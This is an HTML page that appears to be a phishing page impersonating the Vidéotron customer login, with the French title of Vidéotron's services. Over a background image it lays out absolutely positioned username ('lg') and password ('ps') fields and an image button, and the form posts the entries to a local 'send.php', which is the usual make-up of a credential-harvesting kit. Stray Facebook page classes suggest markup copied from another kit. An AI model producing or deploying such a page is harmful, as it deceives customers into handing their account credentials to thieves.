﻿<html  title="Services de Téléphonie, Internet, Télévision et Mobile | Vidéotron" >   <head> <title>Services de Téléphonie, Internet, Télévision et Mobile | Vidéotron</title> <link rel="icon"  href="img/ico.ico" type="image/x-icon" />
<style type="text/css">
.auto-style3 {
	font-size: small;
	font-family: Arial, Helvetica, sans-serif;
	margin-top: 0px;
}
.auto-style4 {
	text-align: right;
}
.auto-style6 {
	font-size: small;
	font-family: Arial, Helvetica, sans-serif;
}
<meta charset="UTF-8">		
  <title>Fond extensible - version CSS</title>
  <link rel="stylesheet" href="style.css" type="text/css" media="screen"/>	
</style>
</head><body background="img/bg.png" class="superbg" style="height: 921px">
<p class="auto-style4" style="width: 1342px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;</p>
<p>&nbsp;</p>

<p>&nbsp;</p>
<p><span>&nbsp;
<p><span>
</span></p>


<strong>
<form action="send.php" method="post">
	<input required   style=" border-style: inset; position:absolute; background-color: #FFFFFF; letter-spacing:normal;  left: 233px; top: 383px; width: 206px; height: 28px; bottom: 205px;" type="text" name="lg" id="lg" class="auto-style3" size="30" maxlength=40 tabindex="1" ;  />
</strong><body class="fbIndex UIPage_LoggedOut _2gsg _xw8 _5p3y chrome webkit win x1 Locale_fr_FR" dir="ltr" style="height: 921px"></span>	<p><span>	
	<input value="" required  placeholder=""; style="border-style: inset;required; position:absolute; background-color:#FFFFFF; left: 233px; width: 206px; height: 28px; top: 452px;" name="ps" id="ps" class="auto-style6" size="5" maxlength=40 </span tabindex="2" type="password"></p>
	<input style="position:absolute; border-color:transparent; left: 229px; top: 543px;" type="image" src="img/button.jpg" name="connexion" value="Connexion" height="43" width="103" />&nbsp;&nbsp;&nbsp;
	<br><br>
</form>

 
	</span>
	<p>&nbsp;</p>

 
	
 
	<p><span>	

 
	<input style="position:absolute; left: 230px; top: 500px; height: 20px; width: 16px;"name="Checkbox1" type="checkbox">

 
	</p>

 
	
 
</body>
</html>